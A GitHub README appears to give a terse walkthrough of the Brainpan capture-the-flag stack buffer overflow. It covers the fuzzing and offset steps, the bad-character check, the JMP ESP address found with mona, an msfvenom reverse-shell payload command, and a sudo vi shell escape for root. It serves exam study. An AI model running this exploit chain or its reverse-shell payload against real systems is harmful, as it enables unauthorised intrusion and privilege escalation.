infosecx0 / brainpan_buffer_overflow

this is a very good ctf to understand linux and windows both stack based bufferoverflow

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool


this is a very good ctf to understand linux and windows both stack based bufferoverflow

  1. use fuzze .py -- get size where it creashes
  2. create pattern --> pattern_create -l 600
  3. get the eip from immunity -- 72413372
  4. use pattern_offset with -l 600 -q 72413372 -- 520
  5. fire bad chars to find what is working inside
  6. open mona modules : - !mona modules - download mona and paste in .wine/drive_c/program file x86/immuntity/pycommands

check out our file is having protections or not if not then pic the address

  1. find address -- Address=0BADF00D Message= 0x31170000 | 0x31176000 | 0x00006000 | False | False | False | False | False | -1.0- [brainpan.exe] (Z:\root\Downloads\brainpan.exe)

  2. open nasm shell - JMP ESP -- FFE4

  3. find JMP ESp in mona -- !mona find -s “\xff\xe4” -m modules if it is not working then

close the mona modules and in immuntity go to view execcutables modules -- right click on the module and click on dump data in cpu then press ctrl +f and type JMP ESP

whoop! we go the address -- 311712F3 . FFE4 JMP ESP

use these exploits

#msfvenom -p linux/x86/shell/reverse_tcp LHOST= LPORT=1337 -f c -a x86 --platform linux -b "\x00" -e x86/shikata_ga_nai

you got a kali shell perfect coz i am running the downloaded exe in my kali . now its time to execute it on the actual target

now change the address of breainpain machine as

send you got a shell but not first time with nc

so try multi handler ( protip : -- its allowed in OSCP if you are in fear not to use only meterperter is used at once -- other wise multihandler , msfvenom , auxilary you can use,also scripts )

type sudo -l

use command manual vi !bin/bash

boom !!!

it also contains a linux bof so i will upload it in my blog

i will also uploadloading the entire process at my blog -

regards, Naresh


this is a very good ctf to understand linux and windows both stack based bufferoverflow


Language:Python 100.0%